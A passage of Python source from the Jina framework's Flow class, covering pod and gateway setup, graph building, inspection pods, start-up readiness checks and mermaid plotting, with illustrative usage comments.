Define per Pod:
- ANY: only one (whoever is idle) Pea polls the message
- ALL: all Peas poll the message (like a broadcast)
Define per Endpoint:
JSON dict, {endpoint: PollingType}
{'/custom': 'ALL', '/search': 'ANY', '*': 'ANY'}
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param uses: The YAML file represents a flow
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_flow
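# A minimal construction sketch for the keyword-only overloads above
# (values are illustrative): any kwargs not known to the flow parser fall
# through to the gateway/pod/client parsers via FALLBACK_PARSERS.
#
#   f = Flow(protocol='http', port_expose=12345, name='my_flow')
#   # or, assuming the JAMLCompatible.load_config helper:
#   # f = Flow.load_config('flow.yml')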
def __init__(
self,
args: Optional['argparse.Namespace'] = None,
**kwargs,
):
super().__init__()
self._version = '1' #: YAML version number, this will be later overridden if YAML config says the other way
self._pod_nodes = OrderedDict() # type: Dict[str, Pod]
self._inspect_pods = {} # type: Dict[str, str]
self._endpoints_mapping = {} # type: Dict[str, Dict]
self._build_level = FlowBuildLevel.EMPTY
self._last_changed_pod = [
GATEWAY_NAME
] #: default first pod is gateway, will add when build()
self._update_args(args, **kwargs)
self.k8s_infrastructure_manager = None
if self.args.infrastructure == InfrastructureType.K8S:
self.k8s_connection_pool = kwargs.get('k8s_connection_pool', True)
self.k8s_infrastructure_manager = self._FlowK8sInfraResourcesManager(
k8s_namespace=self.args.k8s_namespace or self.args.name,
k8s_custom_resource_dir=getattr(
self.args, 'k8s_custom_resource_dir', None
),
)
else:
self.k8s_connection_pool = False
if isinstance(self.args, argparse.Namespace):
self.logger = JinaLogger(
self.__class__.__name__, **vars(self.args), **self._common_kwargs
)
else:
self.logger = JinaLogger(self.__class__.__name__, **self._common_kwargs)
def _update_args(self, args, **kwargs):
from ..parsers.flow import set_flow_parser
from ..helper import ArgNamespace
_flow_parser = set_flow_parser()
if args is None:
args = ArgNamespace.kwargs2namespace(
kwargs, _flow_parser, True, fallback_parsers=FALLBACK_PARSERS
)
self.args = args
# common args should be the ones that can not be parsed by _flow_parser
known_keys = vars(args)
self._common_kwargs = {k: v for k, v in kwargs.items() if k not in known_keys}
self._kwargs = ArgNamespace.get_non_defaults_args(
args, _flow_parser
) #: for yaml dump
if self._common_kwargs.get('asyncio', False) and not isinstance(
self, AsyncPostMixin
):
from .asyncio import AsyncFlow
self.__class__ = AsyncFlow
@staticmethod
def _parse_endpoints(op_flow, pod_name, endpoint, connect_to_last_pod=False) -> Set:
# parsing needs
if isinstance(endpoint, str):
endpoint = [endpoint]
elif not endpoint:
if op_flow._last_changed_pod and connect_to_last_pod:
endpoint = [op_flow.last_pod]
else:
endpoint = []
if isinstance(endpoint, (list, tuple)):
for idx, s in enumerate(endpoint):
if s == pod_name:
raise FlowTopologyError(
'the input/output of a pod can not be itself'
)
else:
raise ValueError(f'endpoint={endpoint} is not parsable')
# if an endpoint is being inspected, then replace it with inspected Pod
endpoint = set(op_flow._inspect_pods.get(ep, ep) for ep in endpoint)
return endpoint
@property
def last_pod(self):
"""Last pod
.. # noqa: DAR401
.. # noqa: DAR201
"""
return self._last_changed_pod[-1]
@last_pod.setter
def last_pod(self, name: str):
"""
Set a Pod as the last Pod in the Flow, useful when modifying the Flow.
.. # noqa: DAR401
:param name: the name of the existing Pod
"""
if name not in self._pod_nodes:
raise FlowMissingPodError(f'{name} can not be found in this Flow')
if self._last_changed_pod and name == self.last_pod:
pass
else:
self._last_changed_pod.append(name)
# graph is now changed so we need to
# reset the build level to the lowest
self._build_level = FlowBuildLevel.EMPTY
@allowed_levels([FlowBuildLevel.EMPTY])
def _add_gateway(
self,
needs: str,
graph_description: Dict[str, List[str]],
pod_addresses: Dict[str, List[str]],
**kwargs,
):
kwargs.update(
dict(
name=GATEWAY_NAME,
ctrl_with_ipc=True, # otherwise ctrl port would be conflicted
host=self.host,
protocol=self.protocol,
port_expose=self.port_expose,
pod_role=PodRoleType.GATEWAY,
expose_endpoints=json.dumps(self._endpoints_mapping),
k8s_namespace=self.args.k8s_namespace or self.args.name,
)
)
kwargs.update(self._common_kwargs)
args = ArgNamespace.kwargs2namespace(kwargs, set_gateway_parser())
args.k8s_namespace = self.args.k8s_namespace or self.args.name
args.noblock_on_start = True
args.graph_description = json.dumps(graph_description)
args.pods_addresses = json.dumps(pod_addresses)
if not self.args.infrastructure == InfrastructureType.K8S:
args.k8s_connection_pool = False
else:
args.k8s_connection_pool = self.k8s_connection_pool
self._pod_nodes[GATEWAY_NAME] = PodFactory.build_pod(
args, needs, self.args.infrastructure
)
def _get_pod_addresses(self) -> Dict[str, List[str]]:
graph_dict = {}
if self.args.infrastructure == InfrastructureType.K8S:
if self.k8s_connection_pool:
return {}
else:
# build graph dict
for node, v in self._pod_nodes.items():
if node == 'gateway':
continue
from jina.peapods.networking import K8sGrpcConnectionPool
pod_k8s_address = (
f'{v.name}-head.{self.args.k8s_namespace or self.args.name}.svc'
)
graph_dict[node] = [
f'{pod_k8s_address}:{K8sGrpcConnectionPool.K8S_PORT_IN}'
]
else:
for node, v in self._pod_nodes.items():
if node == 'gateway':
continue
graph_dict[node] = [f'{v.host}:{v.head_port_in}']
return graph_dict
def _get_graph_representation(self) -> Dict[str, List[str]]:
def _add_node(graph, n):
# in the graph we need to distinguish between start and end gateway, although they are the same pod
if n == 'gateway':
n = 'start-gateway'
if n not in graph:
graph[n] = []
return n
graph_dict = {}
for node, v in self._pod_nodes.items():
node = _add_node(graph_dict, node)
if node == 'start-gateway':
continue
for need in sorted(v.needs):
need = _add_node(graph_dict, need)
graph_dict[need].append(node)
# find all non hanging leafs
last_pod = self.last_pod
if last_pod != 'gateway':
graph_dict[last_pod].append('end-gateway')
return graph_dict
@allowed_levels([FlowBuildLevel.EMPTY])
def needs(
self, needs: Union[Tuple[str], List[str]], name: str = 'joiner', *args, **kwargs
) -> 'Flow':
"""
Add a blocker to the Flow, wait until all peas defined in **needs** completed.
.. # noqa: DAR401
:param needs: list of service names to wait
:param name: the name of this joiner, by default is ``joiner``
:param args: additional positional arguments forwarded to the add function
:param kwargs: additional key value arguments forwarded to the add function
:return: the modified Flow
"""
if len(needs) <= 1:
raise FlowTopologyError(
'no need to wait for a single service, need len(needs) > 1'
)
return self.add(
name=name, needs=needs, pod_role=PodRoleType.JOIN, *args, **kwargs
)
def needs_all(self, name: str = 'joiner', *args, **kwargs) -> 'Flow':
"""
Collect all hanging Pods so far and add a blocker to the Flow; wait until all hanging Peas have completed.
:param name: the name of this joiner (default is ``joiner``)
:param args: additional positional arguments which are forwarded to the add and needs function
:param kwargs: additional key value arguments which are forwarded to the add and needs function
:return: the modified Flow
"""
needs = _hanging_pods(self)
if len(needs) == 1:
return self.add(name=name, needs=needs, *args, **kwargs)
return self.needs(name=name, needs=needs, *args, **kwargs)
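# A minimal sketch of joining parallel branches (executor names are
# illustrative): both pods receive from the gateway, and `needs` adds a
# joiner pod that waits for both before continuing.
#
#   f = (Flow()
#        .add(name='embed', needs='gateway')
#        .add(name='rank', needs='gateway')
#        .needs(['embed', 'rank']))
#   # or, equivalently, join every hanging pod:
#   # f = f.needs_all()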
# overload_inject_start_pod
@overload
def add(
self,
*,
connection_list: Optional[str] = None,
daemon: Optional[bool] = False,
docker_kwargs: Optional[dict] = None,
entrypoint: Optional[str] = None,
env: Optional[dict] = None,
expose_public: Optional[bool] = False,
external: Optional[bool] = False,
force_update: Optional[bool] = False,
gpus: Optional[str] = None,
host: Optional[str] = '0.0.0.0',
host_in: Optional[str] = '0.0.0.0',
install_requirements: Optional[bool] = False,
log_config: Optional[str] = None,
name: Optional[str] = None,
native: Optional[bool] = False,
peas_hosts: Optional[List[str]] = None,
polling: Optional[str] = 'ANY',
port_in: Optional[int] = None,
port_jinad: Optional[int] = 8000,
pull_latest: Optional[bool] = False,
py_modules: Optional[List[str]] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
quiet_remote_logs: Optional[bool] = False,
replicas: Optional[int] = 1,
runtime_backend: Optional[str] = 'PROCESS',
runtime_cls: Optional[str] = 'WorkerRuntime',
scheduling: Optional[str] = 'LOAD_BALANCE',
shards: Optional[int] = 1,
timeout_ctrl: Optional[int] = 60,
timeout_ready: Optional[int] = 600000,
upload_files: Optional[List[str]] = None,
uses: Optional[Union[str, Type['BaseExecutor'], dict]] = 'BaseExecutor',
uses_after: Optional[Union[str, Type['BaseExecutor'], dict]] = None,
uses_after_address: Optional[str] = None,
uses_before: Optional[Union[str, Type['BaseExecutor'], dict]] = None,
uses_before_address: Optional[str] = None,
uses_metas: Optional[dict] = None,
uses_requests: Optional[dict] = None,
uses_with: Optional[dict] = None,
volumes: Optional[List[str]] = None,
workspace: Optional[str] = None,
**kwargs,
) -> Union['Flow', 'AsyncFlow']:
"""Add an Executor to the current Flow object.
:param connection_list: dictionary JSON with a list of connections to configure
:param daemon: The Pea attempts to terminate all of its Runtime child processes/threads on exiting. Setting it to true basically tells the Pea not to wait on the Runtime when closing
:param docker_kwargs: Dictionary of kwargs arguments that will be passed to Docker SDK when starting the docker '
container.
More details can be found in the Docker SDK docs: https://docker-py.readthedocs.io/en/stable/
:param entrypoint: The entrypoint command overrides the ENTRYPOINT in the Docker image. When not set, the Docker image ENTRYPOINT takes effect.
:param env: The map of environment variables that are available inside runtime
:param expose_public: If set, expose the public IP address to remote when necessary, by default it exposes the private IP address, which only allows accessing under the same network/subnet. Important to set this to true when the Pea will receive input connections from remote Peas
:param external: The Pod will be considered an external Pod that has been started independently from the Flow. This Pod will not be context managed by the Flow.
:param force_update: If set, always pull the latest Hub Executor bundle even it exists on local
:param gpus: This argument allows a dockerized Jina Executor to discover local GPU devices.
Note,
- To access all gpus, use `--gpus all`.
- To access multiple gpus, e.g. make use of 2 gpus, use `--gpus 2`.
- To access specified gpus based on device id, use `--gpus device=[YOUR-GPU-DEVICE-ID]`
- To access specified gpus based on multiple device id, use `--gpus device=[YOUR-GPU-DEVICE-ID1],device=[YOUR-GPU-DEVICE-ID2]`
- To specify more parameters, use `--gpus device=[YOUR-GPU-DEVICE-ID],runtime=nvidia,capabilities=display`
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param host_in: The host address for binding to, by default it is 0.0.0.0
:param install_requirements: If set, install `requirements.txt` in the Hub Executor bundle to local
:param log_config: The YAML config of the logger used in this object.
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param native: If set, only native Executors are allowed, and the Executor is always run inside WorkerRuntime.
:param peas_hosts: The hosts of the peas when shards greater than 1.
Peas will be evenly distributed among the hosts. By default,
peas are running on host provided by the argument ``host``
:param polling: The polling strategy of the Pod and its endpoints (when `shards>1`).
Can be defined for all endpoints of a Pod or by endpoint.
Define per Pod:
- ANY: only one (whoever is idle) Pea polls the message
- ALL: all Peas poll the message (like a broadcast)
Define per Endpoint:
JSON dict, {endpoint: PollingType}
{'/custom': 'ALL', '/search': 'ANY', '*': 'ANY'}
:param port_in: The port for input data to bind to, default a random port between [49152, 65535]
:param port_jinad: The port of the remote machine for usage with JinaD.
:param pull_latest: Pull the latest image before running
:param py_modules: The customized python modules need to be imported before loading the executor
Note that the recommended way is to only import a single module - a simple python file, if your
executor can be defined in a single file, or an ``__init__.py`` file if you have multiple files,
which should be structured as a python package. For more details, please see the
`Executor cookbook <https://docs.jina.ai/fundamentals/executor/repository-structure/>`__
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param quiet_remote_logs: Do not display the streaming of remote logs on local console
:param replicas: The number of replicas in the pod, `port_in` and `port_out` will be set to random, and routers will be added automatically when necessary
:param runtime_backend: The parallel backend of the runtime inside the Pea
:param runtime_cls: The runtime class to run inside the Pea
:param scheduling: The strategy of scheduling workload among Peas
:param shards: The number of shards in the pod running at the same time, `port_in` and `port_out` will be set to random, and routers will be added automatically when necessary. For more details check https://docs.jina.ai/fundamentals/flow/topology/
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param timeout_ready: The timeout in milliseconds of a Pea waits for the runtime to be ready, -1 for waiting forever
:param upload_files: The files on the host to be uploaded to the remote
workspace. This can be useful when your Pod has more
file dependencies beyond a single YAML file, e.g.
Python files, data files.
Note,
- currently only a flattened structure is supported, which means if you upload `[./foo/a.py, ./foo/b.pp, ./bar/c.yml]`, they will be put under the _same_ workspace on the remote, losing all hierarchies.
- by default, `--uses` YAML file is always uploaded.
- uploaded files are by default isolated across the runs. To ensure files are submitted to the same workspace across different runs, use `--workspace-id` to specify the workspace.
:param uses: The config of the executor, it could be one of the followings:
* an Executor YAML file (.yml, .yaml, .jaml)
* a Jina Hub Executor (must start with `jinahub://` or `jinahub+docker://`)
* a docker image (must start with `docker://`)
* the string literal of a YAML config (must start with `!` or `jtype: `)
* the string literal of a JSON config
When used under Python, the following values are additionally supported:
- a Python dict that represents the config
- a text file stream that has a `.read()` interface
:param uses_after: The executor attached after the Peas described by --uses, typically used for receiving from all shards, accepted type follows `--uses`
:param uses_after_address: The address of the uses-after runtime
:param uses_before: The executor attached before the Peas described by --uses, typically used before sending to all shards, accepted type follows `--uses`
:param uses_before_address: The address of the uses-before runtime
:param uses_metas: Dictionary of keyword arguments that will override the `metas` configuration in `uses`
:param uses_requests: Dictionary of keyword arguments that will override the `requests` configuration in `uses`
:param uses_with: Dictionary of keyword arguments that will override the `with` configuration in `uses`
:param volumes: The path on the host to be mounted inside the container.
Note,
- If separated by `:`, then the first part will be considered as the local host path and the second part is the path in the container system.
- If no split provided, then the basename of that directory will be mounted into container's root path, e.g. `--volumes="/user/test/my-workspace"` will be mounted into `/my-workspace` inside the container.
- All volumes are mounted with read-write mode.
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
:return: a (new) Flow object with modification
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_pod
@allowed_levels([FlowBuildLevel.EMPTY])
def add(
self,
*,
needs: Optional[Union[str, Tuple[str], List[str]]] = None,
copy_flow: bool = True,
pod_role: 'PodRoleType' = PodRoleType.POD,
**kwargs,
) -> 'Flow':
"""
Add a Pod to the current Flow object and return the new modified Flow object.
The attribute of the Pod can be later changed with :py:meth:`set` or deleted with :py:meth:`remove`
.. # noqa: DAR401
:param needs: the name of the Pod(s) that this Pod receives data from.
One can also use 'gateway' to indicate the connection with the gateway.
:param pod_role: the role of the Pod, used for visualization and route planning
:param copy_flow: when set to true, then always copy the current Flow and do the modification on top of it then return, otherwise, do in-line modification
:param kwargs: other keyword-value arguments that the Pod CLI supports
:return: a (new) Flow object with modification
"""
op_flow = copy.deepcopy(self) if copy_flow else self
# pod naming logic
pod_name = kwargs.get('name', None)
if pod_name in op_flow._pod_nodes:
new_name = f'{pod_name}{len(op_flow._pod_nodes)}'
self.logger.debug(
f'"{pod_name}" is used in this Flow already! renamed it to "{new_name}"'
)
pod_name = new_name
if not pod_name:
pod_name = f'executor{len(op_flow._pod_nodes)}'
if not pod_name.isidentifier():
# hyphen - can not be used in the name
raise ValueError(
f'name: {pod_name} is invalid, please follow the python variable name conventions'
)
# needs logic
needs = op_flow._parse_endpoints(
op_flow, pod_name, needs, connect_to_last_pod=True
)
# set the kwargs inherit from `Flow(kwargs1=..., kwargs2=)`
for key, value in op_flow._common_kwargs.items():
if key not in kwargs:
kwargs[key] = value
# check if host is set to remote:port
if 'host' in kwargs:
m = re.match(_regex_port, kwargs['host'])
if (
kwargs.get('host', __default_host__) != __default_host__
and m
and 'port_jinad' not in kwargs
):
kwargs['port_jinad'] = m.group(2)
kwargs['host'] = m.group(1)
# update kwargs of this Pod
kwargs.update(dict(name=pod_name, pod_role=pod_role, num_part=len(needs)))
parser = set_pod_parser()
if pod_role == PodRoleType.GATEWAY:
parser = set_gateway_parser()
args = ArgNamespace.kwargs2namespace(
kwargs, parser, True, fallback_parsers=FALLBACK_PARSERS
)
# pod workspace if not set then derive from flow workspace
args.workspace = os.path.abspath(args.workspace or self.workspace)
args.k8s_namespace = self.args.k8s_namespace or self.args.name
args.noblock_on_start = True
args.extra_search_paths = self.args.extra_search_paths
port_in = kwargs.get('port_in', None)
if not port_in:
port_in = helper.random_port()
args.port_in = port_in
if not self.args.infrastructure == InfrastructureType.K8S:
args.k8s_connection_pool = False
else:
# TODO: this should not be necessary, but the boolean flag handling in the parser is not able to handle this
args.k8s_connection_pool = kwargs.get(
'k8s_connection_pool', self.k8s_connection_pool
)
op_flow._pod_nodes[pod_name] = PodFactory.build_pod(
args, needs, self.args.infrastructure
)
op_flow.last_pod = pod_name
return op_flow
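# A minimal sketch of the runtime `add` call above (names and `uses` values
# are illustrative): each call returns a (possibly copied) Flow, so calls can
# be chained, and `needs` defaults to the last added pod.
#
#   f = (Flow()
#        .add(name='crafter', uses='MyCrafter.yml')
#        .add(name='indexer', uses='jinahub://SimpleIndexer', shards=2))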
@allowed_levels([FlowBuildLevel.EMPTY])
def inspect(self, name: str = 'inspect', *args, **kwargs) -> 'Flow':
"""Add an inspection on the last changed Pod in the Flow
Internally, it adds two Pods to the Flow. But don't worry, the overhead is minimized and you
can remove them by simply using `Flow(inspect=FlowInspectType.REMOVE)` before using the Flow.
.. highlight:: bash
.. code-block:: bash
Flow -- PUB-SUB -- BasePod(_pass) -- Flow
|
-- PUB-SUB -- InspectPod (Hanging)
In this way, :class:`InspectPod` looks like a simple ``_pass`` from outside and
does not introduce side-effects (e.g. changing the socket type) to the original Flow.
The original incoming and outgoing socket types are preserved.
This function is very handy for introducing an Evaluator into the Flow.
.. seealso::
:meth:`gather_inspect`
:param name: name of the Pod
:param args: args for .add()
:param kwargs: kwargs for .add()
:return: the new instance of the Flow
"""
_last_pod = self.last_pod
op_flow = self.add(
name=name, needs=_last_pod, pod_role=PodRoleType.INSPECT, *args, **kwargs
)
# now remove uses and add an auxiliary Pod
if 'uses' in kwargs:
kwargs.pop('uses')
op_flow = op_flow.add(
name=f'_aux_{name}',
needs=_last_pod,
pod_role=PodRoleType.INSPECT_AUX_PASS,
*args,
**kwargs,
)
# register any future connection to _last_pod by the auxiliary Pod
op_flow._inspect_pods[_last_pod] = op_flow.last_pod
return op_flow
@allowed_levels([FlowBuildLevel.EMPTY])
def gather_inspect(
self,
name: str = 'gather_inspect',
include_last_pod: bool = True,
*args,
**kwargs,
) -> 'Flow':
"""Gather all inspect Pods output into one Pod. When the Flow has no inspect Pod then the Flow itself
is returned.
.. note::
If ``--no-inspect`` is **not** given, then :meth:`gather_inspect` is auto called before :meth:`build`. So
in general you don't need to manually call :meth:`gather_inspect`.
:param name: the name of the gather Pod
:param include_last_pod: if to include the last modified Pod in the Flow
:param args: args for .add()
:param kwargs: kwargs for .add()
:return: the modified Flow or the copy of it
.. seealso::
:meth:`inspect`
"""
needs = [k for k, v in self._pod_nodes.items() if v.role == PodRoleType.INSPECT]
if needs:
if include_last_pod:
needs.append(self.last_pod)
return self.add(
name=name,
needs=needs,
pod_role=PodRoleType.JOIN_INSPECT,
*args,
**kwargs,
)
else:
# no inspect node is in the graph, return the current graph
return self
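# A minimal inspection sketch (the evaluator name/config is illustrative):
# the inspect pod hangs off the last pod without altering the main data path,
# and gather_inspect() is normally invoked automatically during build().
#
#   f = (Flow()
#        .add(name='encoder')
#        .inspect(name='evaluator', uses='MyEvaluator.yml'))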
def _get_gateway_target(self, prefix):
gateway_pod = self._pod_nodes[GATEWAY_NAME]
return (
f'{prefix}-{GATEWAY_NAME}',
{
'host': gateway_pod.head_host,
'port': gateway_pod.head_port_in,
'expected_parts': 0,
},
)
@allowed_levels([FlowBuildLevel.EMPTY])
def build(self, copy_flow: bool = False) -> 'Flow':
"""
Build the current Flow and make it ready to use
.. note::
No need to manually call it since 0.0.8. When using Flow with the
context manager, or using :meth:`start`, :meth:`build` will be invoked.
:param copy_flow: when set to true, then always copy the current Flow and do the modification on top of it then return, otherwise, do in-line modification
:return: the current Flow (by default)
.. note::
``copy_flow=True`` is recommended if you are building the same Flow multiple times in a row. e.g.
.. highlight:: python
.. code-block:: python
f = Flow()
with f:
f.index()
with f.build(copy_flow=True) as fl:
fl.search()
.. # noqa: DAR401
"""
op_flow = copy.deepcopy(self) if copy_flow else self
if op_flow.args.inspect == FlowInspectType.COLLECT:
op_flow.gather_inspect(copy_flow=False)
if GATEWAY_NAME not in op_flow._pod_nodes:
op_flow._add_gateway(
needs={op_flow.last_pod},
graph_description=op_flow._get_graph_representation(),
pod_addresses=op_flow._get_pod_addresses(),
)
removed_pods = []
# if set no_inspect then all inspect related nodes are removed
if op_flow.args.inspect == FlowInspectType.REMOVE:
filtered_pod_nodes = OrderedDict()
for k, v in op_flow._pod_nodes.items():
if not v.role.is_inspect:
filtered_pod_nodes[k] = v
else:
removed_pods.append(v.name)
op_flow._pod_nodes = filtered_pod_nodes
reverse_inspect_map = {v: k for k, v in op_flow._inspect_pods.items()}
while (
len(op_flow._last_changed_pod) > 0
and len(removed_pods) > 0
and op_flow.last_pod in removed_pods
):
op_flow._last_changed_pod.pop()
for end, pod in op_flow._pod_nodes.items():
# if an endpoint is being inspected, then replace it with inspected Pod
# but not those inspect related node
if op_flow.args.inspect.is_keep:
pod.needs = set(
ep if pod.role.is_inspect else op_flow._inspect_pods.get(ep, ep)
for ep in pod.needs
)
else:
pod.needs = set(reverse_inspect_map.get(ep, ep) for ep in pod.needs)
hanging_pods = _hanging_pods(op_flow)
if hanging_pods:
op_flow.logger.warning(
f'{hanging_pods} are hanging in this flow with no pod receiving from them, '
f'you may want to double check if it is intentional or some mistake'
)
op_flow._build_level = FlowBuildLevel.GRAPH
if len(removed_pods) > 0:
# very dirty
op_flow._pod_nodes[GATEWAY_NAME].args.graph_description = json.dumps(
op_flow._get_graph_representation()
)
op_flow._pod_nodes[GATEWAY_NAME].args.pod_addresses = json.dumps(
op_flow._get_pod_addresses()
)
op_flow._pod_nodes[GATEWAY_NAME].update_pea_args()
return op_flow
def __call__(self, *args, **kwargs):
"""Builds the Flow
:param args: args for build
:param kwargs: kwargs for build
:return: the built Flow
"""
return self.build(*args, **kwargs)
def __enter__(self):
with CatchAllCleanupContextManager(self):
return self.start()
def __exit__(self, exc_type, exc_val, exc_tb):
if hasattr(self, '_stop_event'):
self._stop_event.set()
super().__exit__(exc_type, exc_val, exc_tb)
# unset all envs to avoid any side-effect
if self.args.env:
for k in self.args.env.keys():
os.environ.pop(k, None)
# do not know why, but removing these 2 lines makes 2 tests fail
if GATEWAY_NAME in self._pod_nodes:
self._pod_nodes.pop(GATEWAY_NAME)
self._build_level = FlowBuildLevel.EMPTY
self.logger.debug('Flow is closed!')
self.logger.close()
def start(self):
"""Start to run all Pods in this Flow.
Remember to close the Flow with :meth:`close`.
Note that this method has a timeout of ``timeout_ready`` set in CLI,
which is inherited all the way from :class:`jina.peapods.peas.Pea`
.. # noqa: DAR401
:return: this instance
"""
if self._build_level.value < FlowBuildLevel.GRAPH.value:
self.build(copy_flow=False)
if self.k8s_infrastructure_manager is not None:
self.enter_context(self.k8s_infrastructure_manager)
# set env only before the Pod get started
if self.args.env:
for k, v in self.args.env.items():
os.environ[k] = str(v)
for k, v in self:
if not getattr(v.args, 'external', False):
self.enter_context(v)
self._wait_until_all_ready()
self._build_level = FlowBuildLevel.RUNNING
return self
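# A minimal start-up sketch (endpoint and inputs are illustrative): entering
# the context manager calls start(), which builds the graph if needed and
# waits for every pod to report ready before returning.
#
#   with Flow().add(name='encoder') as f:
#       f.post(on='/index', inputs=[])   # post() is provided by PostMixin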
def _wait_until_all_ready(self):
results = {}
threads = []
def _wait_ready(_pod_name, _pod):
try:
if not getattr(_pod.args, 'external', False):
results[_pod_name] = 'pending'
_pod.wait_start_success()
results[_pod_name] = 'done'
except Exception as ex:
results[_pod_name] = repr(ex)
def _polling_status():
spinner = itertools.cycle(
['⠋', '⠙', '⠹', '⠸', '⠼', '⠴', '⠦', '⠧', '⠇', '⠏']
)
while True:
num_all = len(results)
num_done = 0
pendings = []
for _k, _v in results.items():
sys.stdout.flush()
if _v == 'pending':
pendings.append(_k)
else:
num_done += 1
sys.stdout.write('\r{}\r'.format(' ' * 100))
pending_str = colored(' '.join(pendings)[:50], 'yellow')
sys.stdout.write(
f'{colored(next(spinner), "green")} {num_done}/{num_all} waiting {pending_str} to be ready...'
)
sys.stdout.flush()
if not pendings:
sys.stdout.write('\r{}\r'.format(' ' * 100))
break
time.sleep(0.1)
# kick off all pods wait-ready threads
for k, v in self:
t = threading.Thread(
target=_wait_ready,
args=(
k,
v,
),
daemon=True,
)
threads.append(t)
t.start()
# kick off spinner thread
t_m = threading.Thread(target=_polling_status, daemon=True)
t_m.start()
# kick off ip getter thread
addr_table = []
t_ip = None
if self.args.infrastructure != InfrastructureType.K8S:
t_ip = threading.Thread(
target=self._get_address_table, args=(addr_table,), daemon=True
)
t_ip.start()
for t in threads:
t.join()
if t_ip is not None:
t_ip.join()
t_m.join()
error_pods = [k for k, v in results.items() if v != 'done']
if error_pods:
self.logger.error(
f'Flow is aborted due to {error_pods} can not be started.'
)
self.close()
raise RuntimeFailToStart
else:
if self.args.infrastructure == InfrastructureType.K8S:
success_msg = colored('🎉 Kubernetes Flow is ready to use!', 'green')
else:
success_msg = colored('🎉 Flow is ready to use!', 'green')
if addr_table:
self.logger.info(success_msg + '\n' + '\n'.join(addr_table))
self.logger.debug(
f'{self.num_pods} Pods (i.e. {self.num_peas} Peas) are running in this Flow'
)
@property
def num_pods(self) -> int:
"""Get the number of Pods in this Flow
.. # noqa: DAR201"""
return len(self._pod_nodes)
@property
def num_peas(self) -> int:
"""Get the number of peas (shards count) in this Flow
.. # noqa: DAR201"""
return sum(v.num_peas for v in self._pod_nodes.values())
def __eq__(self, other: 'Flow') -> bool:
"""
Compare the topology of a Flow with another Flow.
Identification is defined by whether two flows share the same set of edges.
:param other: the second Flow object
:return: result of equality check
"""
if self._build_level.value < FlowBuildLevel.GRAPH.value:
op_flow = copy.deepcopy(self)
a = op_flow.build()
else:
a = self
if other._build_level.value < FlowBuildLevel.GRAPH.value:
op_flow_b = copy.deepcopy(other)
b = op_flow_b.build()
else:
b = other
return a._pod_nodes == b._pod_nodes
@property
def client(self) -> 'BaseClient':
"""Return a :class:`BaseClient` object attach to this Flow.
.. # noqa: DAR201"""
kwargs = dict(
host=self.host,
port=self.port_expose,
protocol=self.protocol,
)
kwargs.update(self._common_kwargs)
return Client(**kwargs)
@property
def _mermaid_str(self):
mermaid_graph = [
'''
%%{init:{
"theme": "base",
"themeVariables": {
"primaryColor": "#fff",
"primaryBorderColor": "#fff",
"mainBkg": "#32C8CD",
"clusterBkg": "#EEEDE78C",
"secondaryBorderColor": "none",
"tertiaryBorderColor": "none",
"lineColor": "#a6d8da"
}
}}%%
'''.replace(
'\n', ''
),
'flowchart LR;',
]
pod_nodes = []
# plot subgraphs
for node, v in self._pod_nodes.items():
pod_nodes.append(v.name)
mermaid_graph.extend(v._mermaid_str)
for node, v in self._pod_nodes.items():
for need in sorted(v.needs):
need_print = need
if need == 'gateway':
need_print = 'gatewaystart[gateway]'
node_print = node
if node == 'gateway':
node_print = 'gatewayend[gateway]'
_s_role = self._pod_nodes[need].role
_e_role = self._pod_nodes[node].role
if getattr(self._pod_nodes[need].args, 'external', False):
_s_role = 'EXTERNAL'
if getattr(self._pod_nodes[node].args, 'external', False):
_e_role = 'EXTERNAL'
line_st = '-->'
if _s_role == PodRoleType.INSPECT or _e_role == PodRoleType.INSPECT:
line_st = '-.->'
mermaid_graph.append(
f'{need_print}:::{str(_s_role)} {line_st} {node_print}:::{str(_e_role)};'
)
mermaid_graph.append(f'classDef {str(PodRoleType.INSPECT)} stroke:#F29C9F')
mermaid_graph.append(f'classDef {str(PodRoleType.JOIN_INSPECT)} stroke:#F29C9F')
mermaid_graph.append(
f'classDef {str(PodRoleType.GATEWAY)} fill:none,color:#000,stroke:none'
)
mermaid_graph.append(
f'classDef {str(PodRoleType.INSPECT_AUX_PASS)} stroke-dasharray: 2 2'
)
mermaid_graph.append(f'classDef HEADTAIL fill:#32C8CD1D')
mermaid_graph.append(f'\nclassDef EXTERNAL fill:#fff,stroke:#32C8CD')
return '\n'.join(mermaid_graph)
def plot(
self,
output: Optional[str] = None,
vertical_layout: bool = False,
inline_display: bool = False,
build: bool = True,
copy_flow: bool = True,
) -> 'Flow':
"""
Visualize the Flow up to the current point
If a file name is provided it will create a jpg image with that name,
otherwise it will display the URL for mermaid.
If called within IPython notebook, it will be rendered inline,
otherwise an image will be created.
Example,
.. highlight:: python
.. code-block:: python
flow = Flow().add(name='pod_a').plot('flow.svg')
:param output: a filename specifying the name of the image to be created,
the suffix svg/jpg determines the file type of the output image
:param vertical_layout: top-down or left-right layout
:param inline_display: show image directly inside the Jupyter Notebook
:param build: build the Flow first before plotting, gateway connection can be better showed
:param copy_flow: when set to true, then always copy the current Flow and
do the modification on top of it then return, otherwise, do in-line modification
:return: the Flow
"""
# deepcopy causes the below error while reusing a Flow in Jupyter
# 'Pickling an AuthenticationString object is disallowed for security reasons'
op_flow = copy.deepcopy(self) if copy_flow else self
if build:
op_flow.build(False)
mermaid_str = op_flow._mermaid_str
if vertical_layout:
mermaid_str = mermaid_str.replace('flowchart LR', 'flowchart TD')
image_type = 'svg'
if output and not output.endswith('svg'):
image_type = 'img'
url = op_flow._mermaid_to_url(mermaid_str, image_type)
showed = False
if inline_display:
try:
from IPython.display import display, Image
display(Image(url=url))
showed = True
except:
# no need to panic users
pass
if output:
download_mermaid_url(url, output)
elif not showed:
